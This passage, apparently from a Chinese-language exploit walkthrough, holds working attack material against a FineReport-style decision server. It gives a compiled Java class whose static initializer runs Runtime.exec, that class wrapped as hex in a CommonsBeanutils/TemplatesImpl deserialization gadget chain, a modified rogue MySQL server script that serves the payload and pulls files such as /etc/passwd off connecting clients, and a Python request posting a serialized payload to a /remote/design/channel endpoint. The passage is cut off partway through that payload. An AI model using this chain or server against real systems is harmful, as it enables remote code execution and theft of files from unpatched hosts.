104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 100, 111, 99, 117, 109, 101, 110, 116, 1, 0, 45, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 1, 0, 8, 104, 97, 110, 100, 108, 101, 114, 115, 1, 0, 66, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 10, 69, 120, 99, 101, 112, 116, 105, 111, 110, 115, 7, 0, 45, 1, 0, -90, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 105, 116, 101, 114, 97, 116, 111, 114, 1, 0, 53, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 1, 0, 7, 104, 97, 110, 100, 108, 101, 114, 1, 0, 65, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 8, 60, 99, 108, 105, 110, 105, 116, 62, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 41, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 9, 67, 97, 108, 99, 46, 106, 97, 118, 97, 12, 0, 9, 0, 10, 7, 0, 46, 12, 0, 47, 0, 48, 1, 0, 4, 99, 97, 108, 99, 12, 0, 49, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 51, 0, 10, 1, 0, 16, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 1, 0, 64, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 114, 117, 110, 116, 105, 109, 101, 47, 65, 98, 115, 116, 114, 97, 99, 116, 84, 114, 97, 110, 115, 108, 101, 116, 1, 0, 57, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 84, 114, 97, 110, 115, 108, 101, 116, 69, 120, 99, 101, 112, 116, 105, 111, 110, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 4, 101, 120, 101, 99, 1, 0, 39, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 0, 33, 0, 7, 0, 8, 0, 0, 0, 0, 0, 4, 0, 1, 0, 9, 0, 10, 0, 1, 0, 11, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 13, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 14, 0, 15, 0, 0, 0, 1, 0, 16, 0, 17, 0, 2, 0, 11, 0, 0, 0, 63, 0, 0, 0, 3, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 22, 0, 13, 0, 0, 0, 32, 0, 3, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 20, 0, 21, 0, 2, 0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 1, 0, 16, 0, 24, 0, 2, 0, 11, 0, 0, 0, 73, 0, 0, 0, 4, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 25, 0, 13, 0, 0, 0, 42, 0, 4, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 25, 0, 26, 0, 2, 0, 0, 0, 1, 0, 27, 0, 28, 0, 3, 0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 8, 0, 29, 0, 10, 0, 1, 0, 11, 0, 0, 0, 97, 0, 2, 0, 1, 0, 0, 0, 18, -72, 0, 2, 18, 3, -74, 0, 4, 87, -89, 0, 8, 75, 42, -74, 0, 6, -79, 0, 1, 0, 0, 0, 9, 0, 12, 0, 5, 0, 3, 0, 12, 0, 0, 0, 22, 0, 5, 0, 0, 0, 14, 0, 9, 0, 17, 0, 12, 0, 15, 0, 13, 0, 16, 0, 17, 0, 18, 0, 13, 0, 0, 0, 12, 0, 1, 0, 13, 0, 4, 0, 30, 0, 31, 0, 0, 0, 32, 0, 0, 0, 7, 0, 2, 76, 7, 0, 33, 4, 0, 1, 0, 34, 0, 0, 0, 2, 0, 35, 112, 116, 0, 18, 110, 97, 109, 101, 53, 53, 48, 54, 57, 49, 56, 53, 51, 56, 52, 55, 48, 48, 112, 119, 1, 0, 120, 113, 0, 126, 0, 13, 120};
//输出16进行字符串,为mysql反序列化自定义数据做准备,
StringBuilder sb = new StringBuilder();
for (byte b : bytes) {
sb.append(String.format("%02x", b));
}
System.out.println(sb.toString());
//aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372002a6a6176612e6c616e672e537472696e672443617365496e73656e736974697665436f6d70617261746f7277035c7d5c50e5ce02000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e00200007870000005e8cafebabe0000003300340a000800240a002500260800270a002500280700290a0005002a07002b07002c0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100124c6f72672f6578616d706c652f43616c633b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e7307002d0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e010001650100154c6a6176612f696f2f494f457863657074696f6e3b01000d537461636b4d61705461626c6507002901000a536f7572636546696c6501000943616c632e6a6176610c0009000a07002e0c002f003001000463616c630c003100320100136a6176612f696f2f494f457863657074696f6e0c0033000a0100106f72672f6578616d706c652f43616c63010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c6574010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b01000f7072696e74537461636b547261636500210007000800000000000400010009000a0001000b0000002f00010001000000052ab70001b100000002000c0000000600010000000b000d0000000c000100000005000e000f00000001001000110002000b0000003f0000000300000001b100000002000c00000006000100000016000d00000020000300000001000e000f00000000000100120013000100000001001400150002001600000004000100170001001000180002000b000000490000000400000001b100000002000c00000006000100000019000d0000002a000400000001000e000f000000000001001200130001000000010019001a000200000001001b001c0003001600000004000100170008001d000a0001000b000000610002000100000012b800021203b6000457a700084b2ab60006b1000100000009000c00050003000c0000001600050000000e00090011000c000f000d001000110012000d0000000c0001000d0004001e001f000000200000000700024c0700210400010022000000020023707400126e616d653535303639313835333834373030707701007871007e000d78
}
}
利用此脚本来搭建mysql服务端,地址:https://github.com/fnmsd/MySQL_Fake_Server
server.py更改为以下脚本,将生成的16进制数据放到mysql服务端中,
import asyncio
import base64
import logging
import signal
import random
signal.signal(signal.SIGINT, signal.SIG_DFL)
from mysqlproto.protocol import start_mysql_server
from mysqlproto.protocol.base import OK, ERR, EOF
from mysqlproto.protocol.flags import Capability
from mysqlproto.protocol.handshake import HandshakeV10, HandshakeResponse41, AuthSwitchRequest
from mysqlproto.protocol.query import ColumnDefinition, ColumnDefinitionList, ResultSet, FileReadPacket
import subprocess
import time
@asyncio.coroutine
def accept_server(server_reader, server_writer):
task = asyncio.Task(handle_server(server_reader, server_writer))
@asyncio.coroutine
def process_fileread(server_reader, server_writer, filename):
print("Start Reading File:" + filename.decode('utf8'))
FileReadPacket(filename).write(server_writer)
yield from server_writer.drain()
# server_writer.reset()
# time.sleep(3)
isFinish = False
outContent = b''
outputFileName = "%s/%s___%d___%s" % (
fileOutputDir, server_writer.get_extra_info('peername')[:2][0], int(time.time()),
filename.decode('ascii').replace('/', '_').replace('\\', '_').replace(':', '_'))
while not isFinish:
packet = server_reader.packet()
while True:
fileData = (yield from packet.read())
# 当前packet没有未读取完的数据
if fileData == '':
break
# 空包,文件读取结束
if fileData == b'':
isFinish = True
break
outContent += fileData
if len(outContent) == 0:
print("Nothing had been read")
else:
if displayFileContentOnScreen:
print("========File Conntent Preview=========")
try:
print(outContent.decode('utf8')[:1000])
except Exception as e:
# print(e)
print(outContent[:1000])
print("=======File Conntent Preview End==========")
if saveToFile:
with open(outputFileName, 'wb') as f:
f.write(outContent)
print("Save to File:" + outputFileName)
# OK(capability, handshake.status).write(server_writer)
# server_writer.close()
return
@asyncio.coroutine
def handle_server(server_reader, server_writer):
handshake = HandshakeV10()
handshake.write(server_writer)
print("Incoming Connection:" + str(server_writer.get_extra_info('peername')[:2]))
yield from server_writer.drain()
switch2clear = False
handshake_response = yield from HandshakeResponse41.read(server_reader.packet(), handshake.capability)
username = handshake_response.user
print("Login Username:" + username.decode("ascii"))
# print("<=", handshake_response.__dict__)
# 检测是否需要切换到mysql_clear_password
if username.endswith(b"_clear"):
switch2clear = True
username = username[:-len("_clear")]
capability = handshake_response.capability_effective
if (Capability.PLUGIN_AUTH in capability and
handshake.auth_plugin != handshake_response.auth_plugin
and switch2clear):
print("Switch Auth Plugin to mysql_clear_password")
AuthSwitchRequest().write(server_writer)
yield from server_writer.drain()
auth_response = yield from server_reader.packet().read()
print("<=", auth_response)
result = OK(capability, handshake.status)
result.write(server_writer)
yield from server_writer.drain()
while True:
server_writer.reset()
packet = server_reader.packet()
try:
cmd = (yield from packet.read(1))[0]
except Exception as _:
# TODO:可能会出问题 ┓( ´∀` )┏
return
pass
print("<=", cmd)
query = (yield from packet.read())
if query != '':
query = query.decode('ascii')
if username.startswith(b"fileread_"):
yield from process_fileread(server_reader, server_writer, username[len("fileread_"):])
result = OK(capability, handshake.status)
# return
elif username in fileread_dict:
# query =(yield from packet.read())
yield from process_fileread(server_reader, server_writer, fileread_dict[username])
result = OK(capability, handshake.status)
# return
elif username not in yso_dict and not username.startswith(b"yso_"):
# query =(yield from packet.read())
yield from process_fileread(server_reader, server_writer, random.choice(defaultFiles))
result = OK(capability, handshake.status)
print("使用yso了")
elif cmd == 1:
result = ERR(capability)
# return
elif cmd == 3:
# query = (yield from packet.read()).decode('ascii')
if 'SHOW VARIABLES'.lower() in query.lower():
print("Sending Fake MySQL Server Environment Data")
ColumnDefinitionList((ColumnDefinition('d'), ColumnDefinition('e'))).write(server_writer)
EOF(capability, handshake.status).write(server_writer)
ResultSet(("max_allowed_packet", "67108864")).write(server_writer)
ResultSet(("system_time_zone", "UTC")).write(server_writer)
ResultSet(("time_zone", "SYSTEM")).write(server_writer)
ResultSet(("init_connect", "")).write(server_writer)
ResultSet(("auto_increment_increment", "1")).write(server_writer)
result = EOF(capability, handshake.status)
elif username in yso_dict:
# Serial Data
print("Sending Presetting YSO Data with username " + username.decode('ascii'))
ColumnDefinitionList((ColumnDefinition('a'), ColumnDefinition('b'), ColumnDefinition('c'))).write(
server_writer)
EOF(capability, handshake.status).write(server_writer)
ResultSet(("11", yso_dict[username], "2333")).write(server_writer)
result = EOF(capability, handshake.status)
elif username.startswith(b"yso_"):
query = (yield from packet.read())
_, yso_type, yso_command = username.decode('ascii').split("_")
print("Sending YSO data with params:%s,%s" % (yso_type, yso_command))
content = get_yso_content(yso_type, yso_command)
ColumnDefinitionList((ColumnDefinition('a'), ColumnDefinition('b'), ColumnDefinition('c'))).write(
server_writer)
EOF(capability, handshake.status).write(server_writer)
ResultSet(("11", content, "2333")).write(server_writer)
result = EOF(capability, handshake.status)
elif query.decode('ascii') == 'select 1':
ColumnDefinitionList((ColumnDefinition('database'),)).write(server_writer)
EOF(capability, handshake.status).write(server_writer)
ResultSet(('test',)).write(server_writer)
result = EOF(capability, handshake.status)
else:
result = OK(capability, handshake.status)
else:
result = ERR(capability)
result.write(server_writer)
yield from server_writer.drain()
yso_dict = {
}
def get_yso_content(yso_type, command):
# popen = subprocess.Popen([javaBinPath, '-jar', ysoserialPath, yso_type, command], stdout=subprocess.PIPE)
# file_content = popen.stdout.read()
b = "aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372002a6a6176612e6c616e672e537472696e672443617365496e73656e736974697665436f6d70617261746f7277035c7d5c50e5ce02000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e00200007870000005e8cafebabe0000003300340a000800240a002500260800270a002500280700290a0005002a07002b07002c0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100124c6f72672f6578616d706c652f43616c633b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e7307002d0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e010001650100154c6a6176612f696f2f494f457863657074696f6e3b01000d537461636b4d61705461626c6507002901000a536f7572636546696c6501000943616c632e6a6176610c0009000a07002e0c002f003001000463616c630c003100320100136a6176612f696f2f494f457863657074696f6e0c0033000a0100106f72672f6578616d706c652f43616c63010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c6574010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b01000f7072696e74537461636b547261636500210007000800000000000400010009000a0001000b0000002f00010001000000052ab70001b100000002000c0000000600010000000b000d0000000c000100000005000e000f00000001001000110002000b0000003f0000000300000001b100000002000c00000006000100000016000d00000020000300000001000e000f00000000000100120013000100000001001400150002001600000004000100170001001000180002000b000000490000000400000001b100000002000c00000006000100000019000d0000002a000400000001000e000f000000000001001200130001000000010019001a000200000001001b001c0003001600000004000100170008001d000a0001000b000000610002000100000012b800021203b6000457a700084b2ab60006b1000100000009000c00050003000c0000001600050000000e00090011000c000f000d001000110012000d0000000c0001000d0004001e001f000000200000000700024c0700210400010022000000020023707400126e616d653535303639313835333834373030707701007871007e000d78"
file_content = b
print("使用了自定义的payload")
return file_content
def addYsoPaylod(username, yso_type, command):
yso_dict[username] = get_yso_content(yso_type, command)
logging.basicConfig(level=logging.INFO)
fileOutputDir = "./fileOutput/"
displayFileContentOnScreen = True
saveToFile = True
fileread_dict = {
}
ysoserialPath = 'ysoserial-0.0.6-SNAPSHOT-all.jar'
javaBinPath = 'java'
defaultFiles = []
if __name__ == "__main__":
import json
with open("config.json") as f:
data = json.load(f)
if 'config' in data:
config_data = data['config']
if 'ysoserialPath' in config_data:
ysoserialPath = config_data['ysoserialPath']
if 'javaBinPath' in config_data:
javaBinPath = config_data['javaBinPath']
if 'fileOutputDir' in config_data:
fileOutputDir = config_data['fileOutputDir']
if 'displayFileContentOnScreen' in config_data:
displayFileContentOnScreen = config_data['displayFileContentOnScreen']
if 'saveToFile' in config_data:
saveToFile = config_data['saveToFile']
import os
try:
os.makedirs(fileOutputDir)
except FileExistsError as _:
pass
for k, v in data['fileread'].items():
if k == '__defaultFiles':
defaultFiles = v
for i in range(len(defaultFiles)):
defaultFiles[i] = defaultFiles[i].encode('ascii')
else:
fileread_dict[k.encode('ascii')] = v.encode('ascii')
# print(fileread_dict)
if "yso" in data:
for k, v in data['yso'].items():
addYsoPaylod(k.encode('ascii'), v[0], v[1])
# print(yso_dict)
loop = asyncio.get_event_loop()
f = start_mysql_server(handle_server, host=None, port=3306)
print("===========================================")
print("MySQL Fake Server")
print("Author:fnmsd(https://blog.csdn.net/fnmsd)")
print("Load %d Fileread usernames :%s" % (len(fileread_dict), list(fileread_dict.keys())))
print("Load %d yso usernames :%s" % (len(yso_dict), list(yso_dict.keys())))
print("Load %d Default Files :%s" % (len(defaultFiles), defaultFiles))
print("Start Server at port 3306")
loop.run_until_complete(f)
loop.run_forever()并将config.json中的__defaultFiles改为想要读取的文件,
{
"config":{
"ysoserialPath":"D:\\nettools\\ysoserial\\ysoserial-all.jar",
"javaBinPath":"java",
"fileOutputDir":"./fileOutput/",
"displayFileContentOnScreen":true,
"saveToFile":true
},
"fileread":{
"win_ini":"c:\\windows\\win.ini",
"win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
"win":"c:\\windows\\",
"linux_passwd":"/etc/passwd",
"linux_hosts":"/etc/hosts",
"index_php":"index.php",
"ssrf":"https://www.baidu.com/",
"__defaultFiles":["D:/1.txt"]
},
"yso":{
"Jdk7u21":["Jdk7u21",""]
}
}将生成的base64序列化数据放入python脚本中运行,
# -*-coding:UTF-8 -*-
import base64
import requests
burp0_url = "http://127.0.0.1:37799/webroot/decision/remote/design/channel"
burp0_headers = {
'Host':'127.0.0.1:37799',
'User-Agent':'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:120.0)Gecko/20100101Firefox/120.0',
'Accept':'application/json,text/javascript,*/*;q=0.01',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding':'gzip,deflate',
'content-type':'application/json',
'x-requested-with':'XMLHttpRequest',
'Connection':'close',
'X-For-Forwarded': '127.0.0.1',
'Referer':'http://127.0.0.1:37799/webroot/decision',
}
b = b"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